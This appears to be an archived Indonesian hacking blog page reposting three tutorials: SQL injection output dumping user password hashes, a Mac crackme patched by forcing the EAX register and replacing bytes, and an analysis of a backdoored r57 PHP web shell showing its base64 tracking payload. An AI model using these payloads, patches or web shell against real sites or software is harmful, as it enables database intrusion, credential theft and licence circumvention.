    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 02:08:47

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Dumping data from database "webthings" Table "wt_users"

    [+] Column(s) ['name', 'password']

    [+] Number of Rows: 2


    [0] admin:e00b29d5b34c3f78df09d45921c9ec47:

    [1] user:098f6bcd4621d373cade4e832627b4f6:


    [-] [02:08:48]

    [-] Total URL Requests 4

    [-] Done


    jangan lupa kita selalu mengecek schemafuzzlog.txt nya

    setelah itu tinggal kita meng crack passwordnya pake program

    gemana rekan2 gampang kan pake schemafuzz

    NB:

    Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

    Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...

    program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

    PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya

    Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.


    By : Jasakom

    Read rest of entry

    10 Desember 2008

    MAC OS X Reversing Tutorial for Beginner

    Tutorial ini hanya terbatas untuk opcode x86, bukan PPC karena yang saya punya cuman hackint0sh.

    Di sini saya akan mencoba membahas crackme yang paling simpel yang dibuat oleh CorruptFire yaitu boolRegistered.

    Kracking Tools
    Sebelum kita mulai tentunya kita harus mengetahui tools2 apa saja yang akan kita gunakan. Apakah kita akan menggunakan Olly Debugger sama seperti di windows?tentu tidak karena sejauh ini belum ada yang membuat kracking tools dengan tampilan GUI seperti OllyDbg. Tools yang akan kita gunakan antara lain:
    1. Debugger, untuk keperluan ini kita gunakan gdb. GDB dibundle jadi satu dengan Apple Developer Tools.
    2. Disassembler, kita akan menggunakan otx dari http://otx.osxninja.com dan class-dump
    3. HexEditor, kita akan menggunakan 0xED.

    gdb
    GDB adalah GNU Project Debugger, yang akan digunakan untuk melakukan tracing selama program di eksekusi. Dengan adanya gdb, kita bisa melakukan tugas2 antara lain:
    1. Start program atau attach program yang telah berjalan
    2. Break, untuk menghentikan sementara program yang sedang berjalan seakan2 program tersebut hang
    3. Mengetahui apa yang terjadi selama program tersebut berhenti.

    GDB sudah dibundling dengan XCode, jadi jika sudah menginstall XCode, tinggal jalankan gdb aja.

    otx

    “otx stands for "object tool extended". It uses otool (object tool) to disassemble a Mach-O executable file, then enhances the disassembled output. Simple enhancements include adding the machine code of each instruction and the offset of each instruction from the beginning of a function.
    More complicated enhancements include displaying the names and data types of Objective-C methods even if symbols have been stripped, and adding comments that describe member variables, function calls, static data and more.”
    -taken from http://otx.osxninja.com/otwtf.html

    You might also be asking yourself what the hell a disassembler is. I’ll tell you what it is...with some help from Wikipedia: http://en.wikipedia.org/wiki/Disassembler

    class-dump
    Aplikasi yang mendisassemble suatu program dengan mengeluarkan hanya judul class-nya saja.

    HexEditor
    “A hex editor is a program which allows you to edit compiled programs and binary data-files. These editors are called hex editors because they most often present data in hexadecimal format. Hexadecimal is used because it is easier for most humans than working in binary. In addition, hexadecimal is frequently useful because computers tend to work with 8-bit bytes of information and because ASCII is an 8-bit code.”
    - taken from http://www.tech-faq.com/hex-editor.shtml

    Hehe... agak males nulisnya jadi copy paste ajah. Ok, langsung aja tu de poin. Dalam melakukan kracking, tentu dikenal tahapan2 yang harus dilakukan yaitu Testing untuk mengetahui bagian mana yang akan dipatch, Disassembling, Debugging untuk mengetahui bagian mana yang seharusnya di-patch dan yang terakhir adalah Patch.

    Testing
    Tahapan ini adalah menjadi sangat penting karena mulai dari sini kita bisa mengetahui perilaku program tersebut, apakah menggunakan serial checking, file lisensi, online activation dll.

    Jalankan program boolRegistered dan masukkan sembarang username dan serial



    Jika nama dan serial yang kita masukkan salah maka akan keluar Error Serial Error bla..bla..bla...

    OK, what next?
    Selanjutnya kita masuk ke tahap disassembling, pertama kita jalankan class-dump dari Terminal



    dan buka file hasil class-dump



    Kita lihat di atas ada beberapa class yang kelihatannya menarik yaitu isRegistered(Boolean), checkRegister dan validateSerial(Boolean). Dan untuk melihat code-nya lebih dalam kita gunakan tool disassembler yang lain yaitu otx.

    Buka OTX dan drag aplikasi boolRegistered ke window otx



    Buka file hasil disassembler, scroll down.... dan kita akan ketemu class2:

    • AppManager awakeFromNib
      Fungsi ini merupakan fungsi inisiasi

    • AppManager applicationDidFinishLaunching
      Fungsi-fungsi yang dijalankan ketika aplikasi telah berjalan

    • AppManager checkRegister:
      Fungsi check register

    • AppManager isRegistered
      Fungsi check apakah sudah ter-register atau belum

    • AppManager validateSerial:forName:
      Fungsi check terhadap nama dan serial yang di-inputkan


    OK, sekarang kita coba lihat class checkRegister dan ada sesuatu yang menarik yaitu string isEqual



    Bagaimana kita menterjemahkan opcode di atas? Sebenernya untuk menterjemahkan hanya diperlukan logika sederhana dengan menggunakan string-string yang telah di tampilkan, misalnya untuk code di atas kita kumpulkan dahulu semua yang bisa kita baca secara logika misalnya kata-kata isEqual dan di bawahnya ada string "The Name you entered is not valid..." yang didahului dengan opcode testb dan je.

    Secara logika berarti pada isEqual terdapat pengecekan sesuatu terhadap sesuatu dan jika hasil pengecekan itu salah maka akan menampilkan Error Message "The Name you entered is not valid...".

    Dari error message tersebut bisa dipastikan bahwa yang dimaksudkan pada isEqual adalah pengecekan terhadap nama yang dimasukkan. Jika pengecekan benar maka akan lompat ke address 0x00002a04 dimana address tersebut akan melanjutkan pengecekan terhadap serial yang dimasukkan.

    Next, kita trace lagi address 0x00002a04 dan ternyata ada lagi isEqual



    tapi untuk rutin pengecekan yang satu ini kita lihat bahwa jika serial yang dimasukkan tidak benar(jne) maka akan lompat ke address 0x00002bc7 dimana jika kita lihat di address tersebut, yang tampil adalah error message "The Serial you entered is not valid. Please cheeck it and try again." Jika kita teliti lebih dalam mulai dari address 0x00002bc7 dan scroll ke atas maka akan kita temui kata2 "successSheet dan itulah yang kita maksud.

    Jadi agar pengecekan serial itu "selalu" benar, maka kita harus melakukan patching terhadap salah satu decision sehingga serial apapun yang selalu dimasukkan akan menjadi benar.



    OK, balik lagi ke address 0x00002a5i yang berisi instruksi jnel 0x00002bc7, kita turun lagi ke bawah sampai dengan ketemu fungsi validateSerial:forName:. Jadi disitulah pengecekan terhadap serial yang kita masukkan valid atau tidak.

    Kita cari code dari class validateSerial:forName: lebih lanjut.



    Di atas adalah sepenggal code dari class validateSerial:forName:. Tidak perlu dijelaskan arti masing2 baris instruksi karena saya sendiri enggak ngerti hehe.... Yang perlu diperhatikan adalah semua return value dari masing-masing fungsi call selalu dimasukkan ke register EAX. Jika EAX berisi 1 maka hasil dari pemaggilan fungsi call berarti benar dan begitu juga sebaliknya.

    Patching

    Kita bisa memulai proses patching pada address:
    1. 0x00002a9a dengan mengeset register EAX menjadi 1
    2. 0x00002c64 dengan melakukan force return menjadi 1

    Sekarang kita coba patch pertama:

    Jalankan gdb dan load aplikasi boolRegistered.app kemudia ketik "r"



    Sekarang kita masukkan sembarang nama dan serial



    Jangan dulu di klik register, tapi kita balik lagi ke Terminal
    Ketik Ctrl+C trus ketik b *0x00002a9a dan ketik c



    Setelah itu masuk ke aplikasi dan klik Register, maka otomatis kita balik lagi ke Terminal karena kita sudah nitip breakpoint ke address 0x00002a9a

    Ketik set $eax=1, artinya kita akan memaksa register EAX berisi satu apapun hasil kalkulasi dari validateSerial:forName:
    Ketik c



    Masuk lagi ke aplikasi boolRegistered, dan hasilnya adalah:



    Wohoho... berhasil...



    Cara kedua:

    Hapus semua breakpoint dengan mengetik d, pilih y
    breakpoint pada address 0x00002c64 dengan mengetikkan b * 0x00002c64, ketik c
    Klik Register pada aplikasi boolRegister maka akan balik lagi ke terminal


    Ketik ret 0x1, ketik c



    Hurrayyyy....

    Tapi itu hanya sebatas trapping di gdb aja, bagaimana membuatnya menjadi permanen? yaitu dengan menulis langsung byte2 yang diperlukan di aplikasinya.

    Buka Hex Editor kita misalnya pake 0xED.

    Klik kanan pada aplikasi boolRegisterd dan pilih Show Package Contents




    Masuk folder Contents > MacOs
    Drag boolRegistered ke 0xED. Trus gimana kita biar tau bagian mana yang di patch?

    Jadi yang akan kita patch adalah address 0x00002a9a dengan mengeset register EAX menjadi 1.

    Hex dari address di atas adalah 84c0, jika jika hanya menggunakan nilai hex tersebut, mungkin banyak juga dari program tersebut menggunakan nilai yang sama. Untuk membedakan nilai hex pada address 00002a9a maka kita menggabungkan dengan nilai hexa di baris bawahnya yaitu 0f8425010000, jadi kalau digabungkan menjadi 84c00f8425010000 dan nilai hexa itu yang akan kita cari di hex editor.



    Pada 0xED, Pilih menu Edit > Find > Find
    Masukkan 84c00f8425010000 dan klik Find, untuk memastikan tidak ada duplicate, klik sekali lagi Find. Kalau itu hanya satu-satunya maka kita akan mulai proses patch.

    jadi fungsi pada address 0x00002a9a yaitu:

    testb %al, %al
    jel 0x00002bc7

    akan kita rubah menjadi



    xor %eax, %eax ==> 31 C0
    incl %eax ==> 40


    karena ada 8 byte yang akan kita ganti jadi sisanya kita isi dengan opcode nop (90)

    84c00f8425010000
    31c0409090909090


    OK, masuk ke 0xED, Pilih menu Edit > Find > Find

    isi Find : 84c00f8425010000
    isi Replace : 31c0409090909090



    klik Replace


    Klik Save. Close 0xED dan jalankan lagi aplikasi boolRegistered, kemudian isikan sembarang nama dan serial misalnya orakanggo dan 1234567
    Klik Register.

    voila!!!!!!!!

    by : Jasakom
    Read rest of entry

    20 November 2008

    "Hacker" yang di hack ??

    Sebenarnya mungkin udah banyak yang tau.. bukan software yang digunakan yang aku titik beratkan disini.. tapi kehati-hatian kita menggunakan apa yang bukan buatan kita.. sapa tau ada sesuatu dibaliknya...

    Singkat ajah.. nih aku ngebahas soal tool yang mungkin udah gak asing lagih ama yang biasa main ama keamanan suatu web atau server web yang ngedukung server side scripting yaitu "SHELL" yang menggunakan "interpreted language" kayak PHP . Disini aku nyontohin pake "r57 shell" yang bisa dengan mudah ditemukan di search engine.

    Langsung yah.. Tau kenapa judulnya kukasih kayak begitu ?? karena aku pengen buktiin.. kalo tool hack ga semuanya punya maksud yang baik ( hehe.. mang ada yang baik ?? ya ada lah.. yang gak baik kan yang salah ngegunainnya ) . Disini aku nyontohin phpshell tadi dengan ilustrasi kode dibawah ini: bisa download dan bongkar sendiri :

    ini aku temukan : coba cari variabel $c1 dan $c2 yang terenkripsi make base64. nih jelasnya :

    $c1 =

    Encoded :

    PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2

    JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l

    lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW

    FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L

    3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr

    J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR

    oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj

    xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO

    i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv

    dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB

    ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2

    hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==


    Decoded :

    =======================================================================================

    $c2=

    Encoded :


    PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh

    IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl

    hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz

    tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa

    XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u

    8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV

    ybmV0LS0+


    Decoded :

    ========================================================================================

    hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)hotlog_js="1.3"hotlog_r+="&js="+hotlog_js;document.write("1")

    Setelah diliat diatas.. dia tuh ngebikin rutin buat ngelog counter dan sepertinya jugak.. hehehe stealing something from you... liat sendiri lah yah di $c1 decoded version. Kalo misalnya variabel itu dihapus.. shell ga bakal jalan seperti diliat di fungsi dibawah :

    fungsi :

    if(empty($c1)||empty($c2)) { die(); }

    $f = '

    ';

    $f .= base64_decode($c1);

    $f .= base64_decode($c2);

    Jadi kalo mau dihapus , yah hapus $c1 , $c2 ama fungsi itu semuah.. baru normal lagi..

    Tapi ini aku ngedit dari versi aslinya lho..

    Alnya ada jugak yang dah ngubah atau nambahin script buat ngelog kedia.. dan dia naroh filenya di hosting dia.. kayak contohnya dulu di http://room-escape-games.com selain ngelog ke server yang bisa diliat di script diatas, dia jugak ngelog ke servernya.

    Jadi .. Hati2 yah.. palagi para defacer tuh.. hehehe... lagi asik2nya nyoret2 di web.. eh ternyata dia ngantarin diri buat dicuri..

    Hehehe...Juga buat para penetration tester.. hati2 yah... kita pengen baik malah jadi korban..

    Jadi bersihin dulu yah toolnya.. tapi kalo males.. donlot ajah diwebku yang udah kubersihin.. di :

    http://malcoder.info/clean.txt

    Yah.. cek lagi lah sapa tau aku ada kelewatan.. tapi pas aku pake sih fine2 ajah.. alnya ga ada keluar lagih di status bar alamat2 asing.

    oya maaf kalo ga semua script keliatan.. aku ga tau cara kerja situs jasakom apakah pake filtering yang kayak script gitu.. alnya berbentuk javascript.. jadi bukan salahku kalo script asli ga muncul..

    greetz :

    ALLAH SWT

    MUHAMMAD SAW



    by: http://jasakom.com
    Read rest of entry
     

    Information Technology & GadGet Copyright © 2009 Gadget Blog is Designed by Ipietoon Sponsored by Online Business Journal